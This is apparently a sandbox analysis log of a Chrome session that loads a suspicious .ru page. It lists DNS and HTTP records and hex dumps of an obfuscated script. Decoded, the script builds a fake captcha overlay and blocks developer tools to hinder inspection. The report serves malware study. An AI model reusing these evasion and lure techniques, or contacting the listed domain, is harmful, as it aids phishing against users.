                      Jan 14, 2025 18:00:46.951061964 CET192.168.2.51.1.1.10x81d4Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:46.951376915 CET192.168.2.51.1.1.10xd93cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                      Jan 14, 2025 18:01:01.163012028 CET192.168.2.51.1.1.10xb5faStandard query (0)cdn.prod.website-files.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 18:01:01.163161039 CET192.168.2.51.1.1.10xf1f5Standard query (0)cdn.prod.website-files.com65IN (0x0001)false
                      Jan 14, 2025 18:01:01.972567081 CET192.168.2.51.1.1.10xc380Standard query (0)cdn.prod.website-files.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 18:01:01.972700119 CET192.168.2.51.1.1.10x405fStandard query (0)cdn.prod.website-files.com65IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 14, 2025 18:00:42.919461966 CET1.1.1.1192.168.2.50xc473No error (0)www.google.com65IN (0x0001)false
                      Jan 14, 2025 18:00:42.919553995 CET1.1.1.1192.168.2.50xeee8No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:43.856775045 CET1.1.1.1192.168.2.50xd218No error (0)xucr.vafdcekgwp.ru65IN (0x0001)false
                      Jan 14, 2025 18:00:43.930470943 CET1.1.1.1192.168.2.50x28b5No error (0)xucr.vafdcekgwp.ru104.21.64.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:43.930470943 CET1.1.1.1192.168.2.50x28b5No error (0)xucr.vafdcekgwp.ru104.21.112.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:43.930470943 CET1.1.1.1192.168.2.50x28b5No error (0)xucr.vafdcekgwp.ru104.21.48.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:43.930470943 CET1.1.1.1192.168.2.50x28b5No error (0)xucr.vafdcekgwp.ru104.21.32.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:43.930470943 CET1.1.1.1192.168.2.50x28b5No error (0)xucr.vafdcekgwp.ru104.21.80.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:43.930470943 CET1.1.1.1192.168.2.50x28b5No error (0)xucr.vafdcekgwp.ru104.21.16.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:43.930470943 CET1.1.1.1192.168.2.50x28b5No error (0)xucr.vafdcekgwp.ru104.21.96.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:45.965347052 CET1.1.1.1192.168.2.50x71ecNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:45.965347052 CET1.1.1.1192.168.2.50x71ecNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:45.965347052 CET1.1.1.1192.168.2.50x71ecNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:45.965347052 CET1.1.1.1192.168.2.50x71ecNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:46.745059013 CET1.1.1.1192.168.2.50x387cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:46.745059013 CET1.1.1.1192.168.2.50x387cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:46.745059013 CET1.1.1.1192.168.2.50x387cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:46.745059013 CET1.1.1.1192.168.2.50x387cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:46.959144115 CET1.1.1.1192.168.2.50x81d4No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:01:01.170557022 CET1.1.1.1192.168.2.50xb5faNo error (0)cdn.prod.website-files.com104.18.161.117A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:01:01.170557022 CET1.1.1.1192.168.2.50xb5faNo error (0)cdn.prod.website-files.com104.18.160.117A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:01:01.171593904 CET1.1.1.1192.168.2.50xf1f5No error (0)cdn.prod.website-files.com65IN (0x0001)false
                      Jan 14, 2025 18:01:01.979319096 CET1.1.1.1192.168.2.50xc380No error (0)cdn.prod.website-files.com104.18.161.117A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:01:01.979319096 CET1.1.1.1192.168.2.50xc380No error (0)cdn.prod.website-files.com104.18.160.117A (IP address)IN (0x0001)false
                      Jan 14, 2025 18:01:01.980635881 CET1.1.1.1192.168.2.50x405fNo error (0)cdn.prod.website-files.com65IN (0x0001)false
                      • xucr.vafdcekgwp.ru
                      • https:
                        • code.jquery.com
                        • cdn.prod.website-files.com
                      • a.nel.cloudflare.com
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549716104.21.64.14435896C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 17:00:44 UTC667OUTGET /aIDt6/ HTTP/1.1
                      Host: xucr.vafdcekgwp.ru
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 17:00:45 UTC1258INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 17:00:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Cache-Control: no-cache, private
                      cf-cache-status: DYNAMIC
                      vary: accept-encoding
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHyb4agNaF6Xhb7HUS1alN5Y1%2FXrbYlIlrKygL2Rsf3BONEZRPLh%2FI3PuySc9LKUBia9PgEfeKeAw2dKVL4zUD%2FGhznuPa9MxUg0OAkbaI8VNWOaT5iiPgljtMDnkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=24752&min_rtt=4488&rtt_var=29627&sent=1696&recv=611&lost=0&retrans=2&sent_bytes=2020524&recv_bytes=75434&delivery_rate=3266679&cwnd=256&unsent_bytes=0&cid=0541da64daee5354&ts=1342976&x=0"
                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IkY0eGxOVVRGdVJUTEZRMnVnQmdLblE9PSIsInZhbHVlIjoicVJXbFcwc0N0QnlzM25ET3J4ZmhvWXExSHdQK2h4ZCt2Z0ttQlBraVMxblNTdHRuS0JUVDczSEVHb2pzS2dZaFFnTVBWc09WRmVlbXhObkpuUWpZNEYwZEVrZ3ErTndaSmpEb1E2eGFmL1lQNVZWRUpLR3VLeEh3cFI2SU94MkYiLCJtYWMiOiJjMTFhMTE1YjlhMDQ0NmNkMzMxMTk5NzI0YzRlNmYxNDI5MTVkYTk4ODY0ZWZjNmYyNGZmZjBhZTRlZjZmMGRjIiwidGFnIjoiIn0%3D; expires=Tue, 14-Jan-2025 19:00:45 GMT; Max-Age=7200; path=/; secure; samesite=none
                      2025-01-14 17:00:45 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 4a 4f 62 6b 51 34 59 6c 42 53 51 58 64 6e 4b 7a 59 35 53 33 4a 50 5a 32 78 53 53 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4f 55 6c 70 4d 6e 42 44 4c 32 31 50 53 6e 56 56 53 56 68 59 61 6b 51 78 53 57 46 31 64 56 46 4f 59 56 56 34 65 57 39 5a 5a 47 6c 53 51 6b 4a 4a 4b 33 5a 4b 65 6d 78 6c 51 54 52 6a 54 56 4e 49 61 30 31 34 63 6e 4e 76 4d 44 4a 50 5a 33 42 44 52 30 74 59 53 6d 35 4e 57 47 73 34 52 30 39 4e 56 69 38 77 4f 44 46 4a 64 31 70 4b 54 30 68 77 65 6a 4e 55 4d 6e 51 32 55 33 64 6d 5a 6b 4a 6b 62 54 68 6e 57 55 6b 32 56 57 74 78 64 6b 5a 7a 4e 33 42 77 4e 31 46 55 65 6e 5a 6a 53 7a 42 50 52 45 63 7a 4c 30 68 61 4f 45 34
                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InJObkQ4YlBSQXdnKzY5S3JPZ2xSS2c9PSIsInZhbHVlIjoiOUlpMnBDL21PSnVVSVhYakQxSWF1dVFOYVV4eW9ZZGlSQkJJK3ZKemxlQTRjTVNIa014cnNvMDJPZ3BDR0tYSm5NWGs4R09NVi8wODFJd1pKT0hwejNUMnQ2U3dmZkJkbThnWUk2VWtxdkZzN3BwN1FUenZjSzBPREczL0haOE4
                      2025-01-14 17:00:45 UTC1369INData Raw: 32 33 33 61 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 34 64 57 4e 79 4c 6e 5a 68 5a 6d 52 6a 5a 57 74 6e 64 33 41 75 63 6e 55 76 59 55 6c 45 64 44 59 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58
                      Data Ascii: 233a<script>if(atob("aHR0cHM6Ly94dWNyLnZhZmRjZWtnd3AucnUvYUlEdDYv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZX
                      2025-01-14 17:00:45 UTC1369INData Raw: 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4f 69 41 6a 4d 44 41 77 4d 44 41 77 4f 47 45 37 44 51 6f 67 49 43 41 67 5a 6d 78 6c 65 43 31
                      Data Ascii: cjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxleC1
                      2025-01-14 17:00:45 UTC1369INData Raw: 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 4a 77 65 44 73 4e 43 69 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 36 49 48 4e 76 62 47 6c 6b 49 43 4d 30 59 32 46 6d 4e 54 41 37 44 51 6f 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4c 58 64 70 5a 48 52 6f 4f 69 41 77 49 44 4e 77 65 43 41 7a
                      Data Ascii: mNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNweCAz
                      2025-01-14 17:00:45 UTC1369INData Raw: 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 44 51 6f 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 54 42 77 65 44 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 70 62 57 63 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57 35 77 64 58 51 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 42 6a 59 57 78 6a 4b 44 45 77 4d 43 55 67 4c 53 41 79 4d 48 42 34 4b 54 73 4e 43 69 41 67 49 43 42 77 59 57 52 6b 61 57 35 6e 4f 69 41 31 63
                      Data Ascii: ogICAgd2lkdGg6IDEwMCU7DQogICAgbWFyZ2luLXRvcDogMTBweDsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBpbWcgew0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW5wdXQgew0KICAgIHdpZHRoOiBjYWxjKDEwMCUgLSAyMHB4KTsNCiAgICBwYWRkaW5nOiA1c
                      2025-01-14 17:00:45 UTC1369INData Raw: 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43
                      Data Ascii: rZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KIC
                      2025-01-14 17:00:45 UTC1369INData Raw: 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 46 6f 56 47 4e 47 59 6d 78 6e 56 31 41 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 46 56 51 64 45 6c 35 52 47 46 6d 65 6e 41 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 46 56 51 64 45 6c 35 52 47 46 6d 65 6e 41 67 4c 53 42 42 61 46 52 6a 52 6d 4a 73 5a 31 64 51 49 44 34 67 61 31 42 73 56 33 70 73 59 6b 64 47 52 79 41 6d 4a 69 41 68 52 55 68 34 64 30 4e 70 62 47 31 4d 53 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41
                      Data Ascii: KSB7DQogICAgICAgIGNvbnN0IEFoVGNGYmxnV1AgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IFVQdEl5RGFmenAgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKFVQdEl5RGFmenAgLSBBaFRjRmJsZ1dQID4ga1BsV3psYkdGRyAmJiAhRUh4d0NpbG1MSykgew0KICAgICA
                      2025-01-14 17:00:45 UTC812INData Raw: 45 56 56 5a 30 46 42 51 56 6c 42 51 55 46 42 52 30 46 44 51 55 31 42 51 55 46 44 56 45 64 56 56 30 35 42 51 55 46 42 53 55 64 4f 53 56 56 72 4d 45 46 42 53 47 39 74 51 55 46 44 51 57 68 42 51 55 45 72 5a 30 46 42 51 55 6c 45 62 30 46 42 51 6a 46 4e 51 55 46 42 4e 6d 31 42 51 55 46 45 63 56 6c 42 51 55 46 59 59 30 70 35 4e 6c 56 55 64 30 46 42 51 55 5a 34 56 55 56 34 56 56 4a 52 51 55 46 42 54 44 68 6e 53 56 41 72 4c 30 46 4e 54 57 74 49 54 56 56 70 53 48 4e 56 61 6b 6c 4e 56 57 6c 49 4f 46 56 70 53 44 68 56 61 6b 67 34 57 57 70 49 4f 45 31 70 53 48 5a 35 4f 45 45 76 63 54 68 42 64 6e 6b 34 51 6d 5a 31 4f 45 4a 51 63 54 6c 42 4c 33 55 34 51 6c 42 31 4e 30 4a 4e 55 57 6c 49 4f 46 46 73 52 79 39 31 4f 55 4a 51 65 54 68 42 4c 79 73 76 51 55 31 6a 61 6b 68 79
                      Data Ascii: EVVZ0FBQVlBQUFBR0FDQU1BQUFDVEdVV05BQUFBSUdOSVVrMEFBSG9tQUFDQWhBQUErZ0FBQUlEb0FBQjFNQUFBNm1BQUFEcVlBQUFYY0p5NlVUd0FBQUZ4VUV4VVJRQUFBTDhnSVArL0FNTWtITVVpSHNVaklNVWlIOFVpSDhVakg4WWpIOE1pSHZ5OEEvcThBdnk4QmZ1OEJQcTlBL3U4QlB1N0JNUWlIOFFsRy91OUJQeThBLysvQU1jakhy
                      2025-01-14 17:00:45 UTC1369INData Raw: 36 39 61 0d 0a 43 64 6d 34 34 4c 32 5a 32 4e 69 74 42 56 55 63 72 5a 6e 6f 35 4b 79 39 52 54 7a 68 33 5a 6a 45 34 5a 31 68 35 51 69 39 75 4b 79 39 6d 4d 7a 41 76 5a 6c 51 30 4b 31 42 4a 52 69 39 32 59 30 63 76 64 6d 59 79 4f 57 5a 4e 53 30 4e 32 57 55 6c 42 64 32 70 34 51 31 41 7a 65 55 4d 76 4e 7a 4e 43 64 6a 63 77 51 6e 64 6a 53 6b 4e 33 59 30 38 76 64 6d 4e 44 52 47 5a 46 53 6b 4e 52 52 55 38 76 5a 6a 4d 32 4b 79 39 72 53 6b 4a 6e 57 48 68 42 5a 33 59 34 4b 30 46 75 4e 45 52 51 53 55 38 35 5a 31 6c 4f 4c 31 42 76 51 6b 52 51 56 55 77 72 64 6c 6c 4f 4f 44 64 4c 5a 47 74 42 51 55 46 42 51 6c 6c 72 64 45 68 53 53 47 38 30 4d 56 6c 57 63 55 46 42 51 55 46 43 4d 31 4a 4b 56 46 56 56 53 44 5a 42 64 30 31 46 55 6b 46 56 4f 55 4a 73 64 57 35 52 51 55 46 44 62
                      Data Ascii: 69aCdm44L2Z2NitBVUcrZno5Ky9RTzh3ZjE4Z1h5Qi9uKy9mMzAvZlQ0K1BJRi92Y0cvdmYyOWZNS0N2WUlBd2p4Q1AzeUMvNzNCdjcwQndjSkN3Y08vdmNDRGZFSkNRRU8vZjM2Ky9rSkJnWHhBZ3Y4K0FuNERQSU85Z1lOL1BvQkRQVUwrdllOODdLZGtBQUFBQllrdEhSSG80MVlWcUFBQUFCM1JKVFVVSDZBd01FUkFVOUJsdW5RQUFDb
                      2025-01-14 17:00:45 UTC328INData Raw: 30 53 56 42 51 4d 6a 42 54 57 55 64 76 54 58 4a 6d 5a 33 68 44 53 45 45 31 4b 30 78 55 65 57 51 76 52 44 64 42 55 32 4a 47 4d 45 70 76 5a 6d 64 33 52 47 5a 45 4e 7a 55 35 4d 32 6c 79 51 57 68 43 61 6d 45 34 52 30 31 52 4e 45 68 79 64 7a 68 56 5a 6b 31 42 61 33 6c 47 62 31 4a 4f 4b 31 68 42 53 57 38 7a 4c 7a 6c 56 5a 30 56 72 64 33 52 4e 56 31 42 52 57 55 4a 45 4d 33 64 42 56 46 6c 48 61 57 4a 75 64 32 39 45 62 45 30 33 55 57 46 59 4e 6e 46 45 52 6b 45 77 55 58 70 32 4f 44 46 43 62 57 64 5a 53 56 6f 79 4b 32 46 72 4d 46 46 4c 61 30 31 75 5a 56 64 75 4d 6d 64 43 52 6b 31 30 56 45 4a 55 4e 7a 42 43 51 32 31 54 62 32 6b 31 4b 30 74 42 4e 56 52 48 56 55 52 6a 4c 31 5a 52 59 32 39 70 63 55 56 6c 5a 6e 56 76 54 31 56 43 51 6b 52 6d 5a 6e 68 56 53 48 46 42 56 57
                      Data Ascii: 0SVBQMjBTWUdvTXJmZ3hDSEE1K0xUeWQvRDdBU2JGMEpvZmd3RGZENzU5M2lyQWhCamE4R01RNEhydzhVZk1Ba3lGb1JOK1hBSW8zLzlVZ0Vrd3RNV1BRWUJEM3dBVFlHaWJud29EbE03UWFYNnFERkEwUXp2ODFCbWdZSVoyK2FrMFFLa01uZVduMmdCRk10VEJUNzBCQ21Tb2k1K0tBNVRHVURjL1ZRY29pcUVlZnVvT1VCQkRmZnhVSHFBVW


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549718151.101.194.1374435896C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 17:00:46 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                      Host: code.jquery.com
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                      sec-ch-ua-platform: "Windows"
                      Accept: */*
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: script
                      Referer: https://xucr.vafdcekgwp.ru/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 17:00:46 UTC613INHTTP/1.1 200 OK
                      Connection: close
                      Content-Length: 89501
                      Server: nginx
                      Content-Type: application/javascript; charset=utf-8
                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                      ETag: "28feccc0-15d9d"
                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                      Access-Control-Allow-Origin: *
                      Cross-Origin-Resource-Policy: cross-origin
                      Via: 1.1 varnish, 1.1 varnish
                      Accept-Ranges: bytes
                      Date: Tue, 14 Jan 2025 17:00:46 GMT
                      Age: 2358572
                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740036-EWR
                      X-Cache: HIT, HIT
                      X-Cache-Hits: 2774, 7
                      X-Timer: S1736874046.494879,VS0,VE0
                      Vary: Accept-Encoding
                      2025-01-14 17:00:46 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                      2025-01-14 17:00:46 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
